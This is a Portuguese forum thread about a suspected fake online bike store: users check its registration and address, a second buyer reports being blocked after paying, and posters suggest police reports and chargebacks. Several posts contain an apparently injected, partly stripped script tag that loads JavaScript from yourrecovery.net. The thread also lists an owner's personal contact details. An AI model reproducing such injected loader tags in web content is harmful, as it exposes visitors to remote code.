Pedal.com.br Página inicial
Fórum Inicial Fórum Inicial > Assuntos Gerais > Fórum Principal
  Novas Mensagens Novas Mensagens RSS Feed - Loja Falsa? Eracycle
   [REGRAS]    FAQ FAQ  Pesquisar no Fórum   Registrar Registrar  Entrar Entrar

Utilizamos cookies para melhorar a sua experiencia no site. Ao continuar navegando voce concorda com a nossa politica de privacidade.


Loja Falsa? Eracycle

 Responder Página  123>
Autor
Mensagem
  Tópico Pesquisar Tópico Pesquisar  Opções do Tópico Opções do Tópico
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Tópico: Loja Falsa? Eracycle
    Postado: 06 Dez 2019 as 11:56
Boa tarde galera,

Comprei uma CALOI COMFORT num site desconhecido. Nem sei realmente como cheguei nele, talvez tenha sido numa das pesquisas no ZOOM.
Enfim, a questão é que eu acabei ficando arrependida da compra pois o site não tem sido muito transparente comigo.

Teoricamente é uma loja nova, até aí tudo bem. Antes de comprar eu olhei a situação do CNPJ na receita federal e conferi também o certificado de segurança do site, está tudo válido. No procon SP tb não tem reclamação registrada e nem no reclame aqui.

A loja é https://www.eracycle.com.br/

Pergutei a eles sobre o prazo, me informaram de 3 a 7 dias úteis. Pedi o código de rastreio e eles disseram não ter, mas que o produto já estava na transportadora.

Estou muito nervosa com isso. Sei que posso ter sido vítima de um golpe então se puderem não me julgar e sim me dar uma luz, agradeço!
Voltar ao Topo
Rogersnn Ver Drop Down
Avatar

Cadastrado em: 27 Fev 2014
São Paulo
Offline
Mensagens:107
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar Rogersnn Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 12:27
Infelizmente não há muito o que fazer. Não sei qual a transportadora que utilizam, mas nem todos tem rastreio. O que eu faria, é esperar os 7 dias de prazo, e depois disso se o produto não chegar, entrar em contato com a administradora do cartão (se foi parcelado) e pedir o estorno do pagamento.
Voltar ao Topo
the brave Ver Drop Down
Avatar

Cadastrado em: 11 Abr 2004
SP/RJ/MG
Offline
Mensagens:1472
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar the brave Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 12:28
Geralmente transportadoras não tem tracking. Tentei falar nos 2 telefones e ninguem atendeu. O endereço me parece que não existe, pois Vila Olimpia, 411 sala 23? Vila Olimpia é um bairro e não nome de Rua. 
Pelo endereço não dá sequer para ir pessoalmente ao escritório deles. Enfim, espero que você receba sua bike. Boa sorte. 
William
Voltar ao Topo
black_ovelha Ver Drop Down
Avatar

Cadastrado em: 06 Nov 2019
São Paulo
Offline
Mensagens:89
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar black_ovelha Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 12:33
Originalmente postado por the brave the brave escreveu:

Geralmente transportadoras não tem tracking. Tentei falar nos 2 telefones e ninguem atendeu. O endereço me parece que não existe, pois Vila Olimpia, 411 sala 23? Vila Olimpia é um bairro e não nome de Rua. 
Pelo endereço não dá sequer para ir pessoalmente ao escritório deles. Enfim, espero que você receba sua bike. Boa sorte. 

Ao contrário, geralmente transportadoras TÊM tracking
Voltar ao Topo
the brave Ver Drop Down
Avatar

Cadastrado em: 11 Abr 2004
SP/RJ/MG
Offline
Mensagens:1472
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar the brave Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 12:50
Bom saber, eu nos meus 50 anos de compras nunca recebi um rss... 
William
Voltar ao Topo
ajunio3 Ver Drop Down


Cadastrado em: 25 Nov 2017
Bahia
Offline
Mensagens:399
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar ajunio3 Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 12:52
Bom, o site não é lá estas coisas, meio suspeito, mas as vezes lojas muito recentes não tem muita grana inicialmente pra bancar um site realmente decente, mas não quer dizer automaticamente que seja um golpe

Agora não tem muito o que se fazer alem de esperar o prazo. 
Voltar ao Topo
the brave Ver Drop Down
Avatar

Cadastrado em: 11 Abr 2004
SP/RJ/MG
Offline
Mensagens:1472
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar the brave Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 12:57
Originalmente postado por the brave the brave escreveu:

Bom saber, eu nos meus 50 anos de compras nunca recebi um rss... 

É melhor então que a Alana aguarde completar os 7 dias e caso não receba a bike, cancele a compra no  cartão mesmo. 
William
Voltar ao Topo
ajunio3 Ver Drop Down


Cadastrado em: 25 Nov 2017
Bahia
Offline
Mensagens:399
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar ajunio3 Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 12:59
Originalmente postado por Rogersnn Rogersnn escreveu:

Infelizmente não há muito o que fazer. Não sei qual a transportadora que utilizam, mas nem todos tem rastreio. O que eu faria, é esperar os 7 dias de prazo, e depois disso se o produto não chegar, entrar em contato com a administradora do cartão (se foi parcelado) e pedir o estorno do pagamento.

Lembrando que pra isso (pedir cancelamento/estorno de pagamento DIRETAMENTE para operadora de cartão) requer um esforço tremendo em provar que se trata de um golpe/roubo. Primeiro terá que esgotar todas as possibilidades com a loja, guardando toda documentação e comunicação trocada com eles pra convencer o cartão a isso.

É possível, mas não é fácil
Voltar ao Topo
Fabio Ver Drop Down


Cadastrado em: 07 Out 2003
-
Offline
Mensagens:8603
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar Fabio Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 13:20
Originalmente postado por ajunio3 ajunio3 escreveu:

Originalmente postado por Rogersnn Rogersnn escreveu:

Infelizmente não há muito o que fazer. Não sei qual a transportadora que utilizam, mas nem todos tem rastreio. O que eu faria, é esperar os 7 dias de prazo, e depois disso se o produto não chegar, entrar em contato com a administradora do cartão (se foi parcelado) e pedir o estorno do pagamento.


Lembrando que pra isso (pedir cancelamento/estorno de pagamento DIRETAMENTE para operadora de cartão) requer um esforço tremendo em provar que se trata de um golpe/roubo. Primeiro terá que esgotar todas as possibilidades com a loja, guardando toda documentação e comunicação trocada com eles pra convencer o cartão a isso.

É possível, mas não é fácil



Eu sempre achei que só estornassem caso fosse um golpe de alguém usando o cartão como se fosse o dono e não o dono tendo caído numa roubada.
Voltar ao Topo
Leo Amaral Ver Drop Down
Avatar

Cadastrado em: 04 Fev 2013
Brasilia
Offline
Mensagens:2858
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar Leo Amaral Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 13:24
Recebeu a NF-e?
------
"If you don't know where you are going, any road will get you there." The Cheshire Cat in Alice's Adventures in Wonderland, Lewis Carroll. Antigo ltadeu70.
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 13:46
É. Eu dei uma desculpa que precisava me organizar pra ter alguém em casa pra receber, eles me disseram, que não tem como rastrear, porém que poderiam me avisar assim que a transportadora chegar na minha cidade.
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 13:47
É, eu fiquei desconfiada depois disso.
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 13:48
Originalmente postado por Rogersnn Rogersnn escreveu:

Infelizmente não há muito o que fazer. Não sei qual a transportadora que utilizam, mas nem todos tem rastreio. O que eu faria, é esperar os 7 dias de prazo, e depois disso se o produto não chegar, entrar em contato com a administradora do cartão (se foi parcelado) e pedir o estorno do pagamento.


É. Eu dei uma desculpa que precisava me organizar pra ter alguém em casa pra receber, eles me disseram, que não tem como rastrear, porém que poderiam me avisar assim que a transportadora chegar na minha cidade.
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 13:50
Originalmente postado por ajunio3 ajunio3 escreveu:

Bom, o site não é lá estas coisas, meio suspeito, mas as vezes lojas muito recentes não tem muita grana inicialmente pra bancar um site realmente decente, mas não quer dizer automaticamente que seja um golpe

Agora não tem muito o que se fazer alem de esperar o prazo. 


Presumi isso quando vi. O site não é grande coisa, mas investiguei o CNPJ, o registro do domínio e também o certificado de segurança. Por tudo que encontrei, ta normal.

Eu fico com medo de estar sendo injusta. Ainda está no prazo. Mas eu to agoniada pra que chegue logo. hehehe
Voltar ao Topo
gm1987 Ver Drop Down


Cadastrado em: 12 Jun 2019
Sapucaia do Sul
Offline
Mensagens:2038
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar gm1987 Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 13:53
Nem toda a transportadora tem rastreio (acessível ao cliente final).

O que você precisa fazer, de primeiro momento, é:

1: Seguir a dica do colega acima referente a NF-e, se não te enviaram, tem que ligar pedindo a NF-e, pois nenhuma transportadora leva sem a nota. Logo, se não há nota, a chance de ser golpe é imensa;

2: Pedir os dados de contato da transportadora, e com o número da nota fiscal, confirmar com a transportadora se existe a encomenda;

2: Esperar o prazo e torcer para não ser uma caixa de pedra.

O prazo de 7 dias eles vão te enrolando, depois vira 10 dias... depois a transportadora perdeu o pacote e vão te enviar outra... e assim te enrolam 60, 90 dias até não ter mais como estornar a compra.
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 14:34
Originalmente postado por gm1987 gm1987 escreveu:

Nem toda a transportadora tem rastreio (acessível ao cliente final).

O que você precisa fazer, de primeiro momento, é:

1: Seguir a dica do colega acima referente a NF-e, se não te enviaram, tem que ligar pedindo a NF-e, pois nenhuma transportadora leva sem a nota. Logo, se não há nota, a chance de ser golpe é imensa;

2: Pedir os dados de contato da transportadora, e com o número da nota fiscal, confirmar com a transportadora se existe a encomenda;

2: Esperar o prazo e torcer para não ser uma caixa de pedra.

O prazo de 7 dias eles vão te enrolando, depois vira 10 dias... depois a transportadora perdeu o pacote e vão te enviar outra... e assim te enrolam 60, 90 dias até não ter mais como estornar a compra.


Obrigada!

Solicitei no contato que eles dizem ser do finaceiro solicitando a NF-e, já que não me mandaram.
Aguardando eles me darem o contato. Vou aguardar até terça-feira, caso não tenha nenhuma resposta vou fazer um B.O. e entrar no PROCON nas pequenas causas.
Voltar ao Topo
Rogersnn Ver Drop Down
Avatar

Cadastrado em: 27 Fev 2014
São Paulo
Offline
Mensagens:107
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Rogersnn Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 16:15

Originalmente postado por aianabenet aianabenet escreveu:

Originalmente postado por Rogersnn Rogersnn escreveu:

Infelizmente não há muito o que fazer. Não sei qual a transportadora que utilizam, mas nem todos tem rastreio. O que eu faria, é esperar os 7 dias de prazo, e depois disso se o produto não chegar, entrar em contato com a administradora do cartão (se foi parcelado) e pedir o estorno do pagamento.
 

É. Eu dei uma desculpa que precisava me organizar pra ter alguém em casa pra receber, eles me disseram, que não tem como rastrear, porém que poderiam me avisar assim que a transportadora chegar na minha cidade.

Torço para que seja realmente isso. E nas próximas compras online, procure não só o preço.
Apesar de já ter tido problemas com lojas grandes também.
Originalmente postado por Fabio Fabio escreveu:

Originalmente postado por ajunio3 ajunio3 escreveu:

Originalmente postado por Rogersnn Rogersnn escreveu:

Infelizmente não há muito o que fazer. Não sei qual a transportadora que utilizam, mas nem todos tem rastreio. O que eu faria, é esperar os 7 dias de prazo, e depois disso se o produto não chegar, entrar em contato com a administradora do cartão (se foi parcelado) e pedir o estorno do pagamento.

Lembrando que pra isso (pedir cancelamento/estorno de pagamento DIRETAMENTE para operadora de cartão) requer um esforço tremendo em provar que se trata de um golpe/roubo. Primeiro terá que esgotar todas as possibilidades com a loja, guardando toda documentação e comunicação trocada com eles pra convencer o cartão a isso.

É possível, mas não é fácil



Eu sempre achei que só estornassem caso fosse um golpe de alguém usando o cartão como se fosse o dono e não o dono tendo caído numa roubada.

Talvez não estornem a primeira parcela, mas se ficar provado que foi golpe, eles podem cancelar as outras parcelas.


Editado por Rogersnn - 06 Dez 2019 as 16:19
Voltar ao Topo
90452 Ver Drop Down


Cadastrado em: 19 Nov 2018
-
Offline
Mensagens:1806
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar 90452 Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 17:12
É incrível como com tantas lojas físicas já consagradas com suas versões online há consumidores se arriscando em lojas online desconhecidas pelo fator preço. Digo isso pq eu mesmo já vim aqui perguntar sobre compras no AliExpress ou mesmo no Mercado Livre e, como já falaram nesse post, tb já tive problemas com lojas consagradas, como a Wallmart e a compra de dois celulares onde um veio com defeito e foi um parto para trocar um deles (levou "só" 3 meses). Realmente é muito suspeito não ter sido enviado a nf-e diretamente ao consumidor via e-mail e não ter rastreio da encomenda mas isso não chega a ser muito complicado, as Casas Bahia não mandam esses dados (pelo menos nos dias que eu comprava lá) nem avisos do andamento da entrega, tudo tem que ser acompanhado pelo site, entrando lá de tempos em tempos para ver como está o status da entrega:



Veja se isso existe na loja, indo lá no seu login e no produto que vc comprou. Como eu disse, não sei como está o sistema de entrega das CB hoje para comparação; o negócio é vc esperar os tais 10 dias e ver como fica. Se não for entregue, vai começar a sua via crucis para receber o que já foi pago. 


Editado por sidserra - 07 Dez 2019 as 06:57
Voltar ao Topo
Fabio Ver Drop Down


Cadastrado em: 07 Out 2003
-
Offline
Mensagens:8603
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar Fabio Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 17:33
MARIA FLAVIA FARIAS SILVA
CNPJ 35.082.048/0001-70
IE: 126.876.562.112
Rua Funchal 411 22º andar
Vila Olímpia
mariasilvafarias01(a)gmail.com
(17) 9641-8737


Estranho não conseguir achar na JUCESP

Abriu em 4/10/2019.


Editado por Fabio - 06 Dez 2019 as 17:35
Voltar ao Topo
RodrigoCasita Ver Drop Down
Avatar

Cadastrado em: 02 Dez 2016
São Paulo
Offline
Mensagens:147
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar RodrigoCasita Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 17:45
Apenas querendo ajudar, o site está registrado no Registro Br com os mesmos dados que constam no rodapé de sua página.
Então se for golpe, ao menos estão usando os mesmos dados em todos os registros.
Talvez apenas trate-se de um empresa pequena e nova que está utilizando uma transportadora de menor porta (sem tracking por exemplo), pois custa menos.
No site da Receita Federal o endereço informado é Rua Funchal, 411 andar 22 na Vila Olimpia.
A saída é aguardar mesmo os 7 dias informado
Voltar ao Topo
MarcioRodrigues Ver Drop Down
Avatar

Cadastrado em: 28 Mai 2019
Jacutinga MG
Offline
Mensagens:104
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar MarcioRodrigues Citar  ResponderResponder Link direto para este Post Postado: 06 Dez 2019 as 18:10
Aparentemente e só Uma Empresa Pequena, que não trabalha com estoque Físico
provavelmente vai receber o Produto sim

e só aguardar
IBIS MOJO HD-R 27.5
KHS Alite 2000 26
Cake DLX5 27.5
Caloi Elite 29
Speed |KHS
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 07 Dez 2019 as 00:09
Originalmente postado por Rogersnn Rogersnn escreveu:


Torço para que seja realmente isso. E nas próximas compras online, procure não só o preço.
Apesar de já ter tido problemas com lojas grandes também.


Rapaz vou te dizer... serviu de uma coisa...lição.
Se realmente for furada, vou comprar outra bike e na verdade nem me importo muito em demorar de receber de volta o dinheiro, desde que receba e que sejam responsabilizados.

De toda forma, tem muitos dados expostos, é estranho que seja golpe. Ainda to tentando acreditar que é tudo paranoia minha.
< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">
Voltar ao Topo
zoda Ver Drop Down


Cadastrado em: 02 Jul 2009
são paulo
Offline
Mensagens:1003
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar zoda Citar  ResponderResponder Link direto para este Post Postado: 07 Dez 2019 as 01:41
Originalmente postado por Fabio Fabio escreveu:

MARIA FLAVIA FARIAS SILVA
CNPJ 35.082.048/0001-70
IE:<span style="white-space:pre">     </span>126.876.562.112
Rua Funchal 411 22º andar
Vila Olímpia
mariasilvafarias01(a)gmail.com
(17) 9641-8737


Estranho não conseguir achar na JUCESP

<span style="color: rgb51, 51, 51; font-family: "Helvetica Neue", Arial, FreeSans, sans-serif; font-size: 12.8px; : rgb255, 255, 255;">Abriu em 4/10/2019.</span>



O prédio situado na Rua Funchal 411, São Paulo, SP, segundo o site abaixo, só tem 13 andares.
https://webescritorios.com.br/edificio-comercial/edificio-funchal-774.
Segundo informações descritas acima a suposta empresa foi aberta recentemente e o DDD 17 não é de São Paulo, SP. Informações que sozinhas não significam nada, mas somando tudo que já foi informado, pode ser um sinal de alerta.
O site descreve que a empresa está há 3 anos como loja física, e 2 anos como online. Segundo informaram no tópico o CNPJ foi aberto em outubro desse ano. Nada impede de ter aberto outro CNPJ, mas é mais uma incoerência (levando em conta a informação de abertura descrita no tópico).
https://www.eracycle.com.br/duvidas-sobre-pagamentos-e-envio/
No Google Maps, digitando o endereço mencionado, aparece na foto uma placa de aluga-se com uns telefones. Tenta ligar para lá e pede informações.
No site abaixo tem um telefone (11- 3045-3261) que seria do prédio n° 411, na citada rua. Mais uma fonte de possível informação.
https://www.guiafacil.com/site/edificio-funchal/sao-paulo/sp/1130453261/
Como a bicicleta comprada foi uma Caloi, poderia entrar em contato com a mesma e tentar obter a informação se a suposta empresa é cliente deles.
Não fazendo qualquer juízo da suposta empresa, e baseado exclusivamente nas informações descritas nesse tópico, e na negativa de informações juntos aos telefones mencionados, ligaria para a operadora do cartão de crédito e tentaria cancelar a operação.


Editado por zoda - 07 Dez 2019 as 03:31
Voltar ao Topo
Paulo Valdevite Ver Drop Down


Cadastrado em: 07 Dez 2019
Serrana
Offline
Mensagens:6
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Paulo Valdevite Citar  ResponderResponder Link direto para este Post Postado: 07 Dez 2019 as 08:50
Bom dia!
Comprei duas bikes, paguei a vista por transferência eletrônica, e depois de muito estresse e discussão me bloquearam em todos os canais de comunicação (chat do site e wtzp).
Até onde me atendiam, pediam para eu ter paciência que estava a caminho mas não sabiam me informar a chegada. Ontem 06/12 eu disse para localizarem o pedido que eu iria mandar um transporte particular buscar e mesmo assim não me ajudaram.
Paguei dia 22/11 no site diz que o pagamento foi confirmado dia 29/11 mas o pedido ainda não foi enviado....mas disseram que foi enviado sim e a transportadora é a Reale Express e para minha infelicidade a única que encontrei na web com esse nome me disseram que não conhecem essa loja.

Alguém conhece alguém que tenha recebido a compra???
Voltar ao Topo
BR040 Ver Drop Down
Avatar

Cadastrado em: 03 Mar 2011
MG
Offline
Mensagens:645
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar BR040 Citar  ResponderResponder Link direto para este Post Postado: 07 Dez 2019 as 09:12
aproveitando o tópico vou relembrar, nunca compre nesta loja

                              https://www.sportsonline.global
se você não parar de pedalar as dificuldades vão ficando para trás

Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 07 Dez 2019 as 10:26
Originalmente postado por zoda zoda escreveu:

Originalmente postado por Fabio Fabio escreveu:

MARIA FLAVIA FARIAS SILVA
CNPJ 35.082.048/0001-70
IE:<span style="white-space:pre">     </span>126.876.562.112
Rua Funchal 411 22º andar
Vila Olímpia
mariasilvafarias01(a)gmail.com
(17) 9641-8737


Estranho não conseguir achar na JUCESP

<span style="color: rgb51, 51, 51; font-family: "Helvetica Neue", Arial, FreeSans, sans-serif; font-size: 12.8px; : rgb255, 255, 255;">Abriu em 4/10/2019.</span>



O prédio situado na Rua Funchal 411, São Paulo, SP, segundo o site abaixo, só tem 13 andares.
https://webescritorios.com.br/edificio-comercial/edificio-funchal-774 - https://webescritorios.com.br/edificio-comercial/edificio-funchal-774.
Segundo informações descritas acima a suposta empresa foi aberta recentemente e o DDD 17 não é de São Paulo, SP. Informações que sozinhas não significam nada, mas somando tudo que já foi informado, pode ser um sinal de alerta.
O site descreve que a empresa está há 3 anos como loja física, e 2 anos como online. Segundo informaram no tópico o CNPJ foi aberto em outubro desse ano. Nada impede de ter aberto outro CNPJ, mas é mais uma incoerência (levando em conta a informação de abertura descrita no tópico).
https://www.eracycle.com.br/duvidas-sobre-pagamentos-e-envio/
No Google Maps, digitando o endereço mencionado, aparece na foto uma placa de aluga-se com uns telefones. Tenta ligar para lá e pede informações.
No site abaixo tem um telefone (11- 3045-3261) que seria do prédio n° 411, na citada rua. Mais uma fonte de possível informação.
https://www.guiafacil.com/site/edificio-funchal/sao-paulo/sp/1130453261/
Como a bicicleta comprada foi uma Caloi, poderia entrar em contato com a mesma e tentar obter a informação se a suposta empresa é cliente deles.
Não fazendo qualquer juízo da suposta empresa, e baseado exclusivamente nas informações descritas nesse tópico, e na negativa de informações juntos aos telefones mencionados, ligaria para a operadora do cartão de crédito e tentaria cancelar a operação.


Assim como o amigo aqui em baixo, eu paguei via transferência bancária... (estupida que fui, mas é pq eu não tenho cartão de crédito, sempre junto o dinheiro pra pagar a vista e ter um melhor desconto... enfim). Já me informei com o meu banco, que me aconselhou que eu aguardasse o prazo e depois disso, constatando o golpe, que eu faça um boletim de ocorrência e entre nas pequenas causas. Eu posso não receber meu dinheiro de volta tão cedo, mas eles serão acionados e responsabilizados pelo transtorno que eles fizeram a gente passar.

Essa ideia de entrar em contato com a CALOI é boa também. Vou ligar lá na segunda-feira.

Não é pelo dinheiro em si, mas por ter sido enganada. Ainda acho estranho tudo isso...
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 07 Dez 2019 as 10:28
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Bom dia!
Comprei duas bikes, paguei a vista por transferência eletrônica, e depois de muito estresse e discussão me bloquearam em todos os canais de comunicação (chat do site e wtzp).
Até onde me atendiam, pediam para eu ter paciência que estava a caminho mas não sabiam me informar a chegada. Ontem 06/12 eu disse para localizarem o pedido que eu iria mandar um transporte particular buscar e mesmo assim não me ajudaram.
Paguei dia 22/11 no site diz que o pagamento foi confirmado dia 29/11 mas o pedido ainda não foi enviado....mas disseram que foi enviado sim e a transportadora é a Reale Express e para minha infelicidade a única que encontrei na web com esse nome me disseram que não conhecem essa loja.

Alguém conhece alguém que tenha recebido a compra???


É isso, eu não vou esperar mais que os 7 dias úteis, ainda estou dando um tempo até o 7º dia útil após a confirmação. Que é sexta-feira. Não chegando, na sexta-feira mesmo eu abro um Boletim de Ocorrência e eles vão se ver é com a justiça.< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 07 Dez 2019 as 10:33
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Bom dia!
Comprei duas bikes, paguei a vista por transferência eletrônica, e depois de muito estresse e discussão me bloquearam em todos os canais de comunicação (chat do site e wtzp).
Até onde me atendiam, pediam para eu ter paciência que estava a caminho mas não sabiam me informar a chegada. Ontem 06/12 eu disse para localizarem o pedido que eu iria mandar um transporte particular buscar e mesmo assim não me ajudaram.
Paguei dia 22/11 no site diz que o pagamento foi confirmado dia 29/11 mas o pedido ainda não foi enviado....mas disseram que foi enviado sim e a transportadora é a Reale Express e para minha infelicidade a única que encontrei na web com esse nome me disseram que não conhecem essa loja.

Alguém conhece alguém que tenha recebido a compra???
< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">

É isso, eu estou aguardando até 7 dias úteis após a confirmação. Que comigo também demorou 72h, mas eles informam isso no site. No meu caso, vai até sexta-feira, caso não chegue na própria sexta-feira eu vou abrir um boletim de ocorrência e eles vão se ver com a justiça.
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 07 Dez 2019 as 10:34
Originalmente postado por sidserra sidserra escreveu:

É incrível como com tantas lojas físicas já consagradas com suas versões online há consumidores se arriscando em lojas online desconhecidas pelo fator preço. Digo isso pq eu mesmo já vim aqui perguntar sobre compras no AliExpress ou mesmo no Mercado Livre e, como já falaram nesse post, tb já tive problemas com lojas consagradas, como a Wallmart e a compra de dois celulares onde um veio com defeito e foi um parto para trocar um deles (levou "só" 3 meses). Realmente é muito suspeito não ter sido enviado a nf-e diretamente ao consumidor via e-mail e não ter rastreio da encomenda mas isso não chega a ser muito complicado, as Casas Bahia não mandam esses dados (pelo menos nos dias que eu comprava lá) nem avisos do andamento da entrega, tudo tem que ser acompanhado pelo site, entrando lá de tempos em tempos para ver como está o status da entrega:



Veja se isso existe na loja, indo lá no seu login e no produto que vc comprou. Como eu disse, não sei como está o sistema de entrega das CB hoje para comparação; o negócio é vc esperar os tais 10 dias e ver como fica. Se não for entregue, vai começar a sua via crucis para receber o que já foi pago. 
< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">


tem em parte, mas só aparece quando vc já pagou... tem pedido realizado e pagamento confirmado. Apenas...

Se arrependimento matasse...
Voltar ao Topo
Paulo Valdevite Ver Drop Down


Cadastrado em: 07 Dez 2019
Serrana
Offline
Mensagens:6
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar Paulo Valdevite Citar  ResponderResponder Link direto para este Post Postado: 07 Dez 2019 as 10:35
Eu irei pessoalmente até encontrar o dono do anúncio.
Se eu não receber as bikes até quarta-feira, perderei dois dias de serviço, mas eu vou achar esse cidadão.
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 07 Dez 2019 as 10:40
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Bom dia!
Comprei duas bikes, paguei a vista por transferência eletrônica, e depois de muito estresse e discussão me bloquearam em todos os canais de comunicação (chat do site e wtzp).
Até onde me atendiam, pediam para eu ter paciência que estava a caminho mas não sabiam me informar a chegada. Ontem 06/12 eu disse para localizarem o pedido que eu iria mandar um transporte particular buscar e mesmo assim não me ajudaram.
Paguei dia 22/11 no site diz que o pagamento foi confirmado dia 29/11 mas o pedido ainda não foi enviado....mas disseram que foi enviado sim e a transportadora é a Reale Express e para minha infelicidade a única que encontrei na web com esse nome me disseram que não conhecem essa loja.

Alguém conhece alguém que tenha recebido a compra???
< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">

Teoricamente, se confirmou dia 29.11, vc receberá dia 10.12. Aguarde até essa data, depois disso junte tudo que você tem de prova e dê entrada num boletim de ocorrência, que faz online mesmo. Em relação ao Procon ainda não sei como faz, mas vamos mantendo contato aqui pra gente se ajudar.
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 07 Dez 2019 as 10:42
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

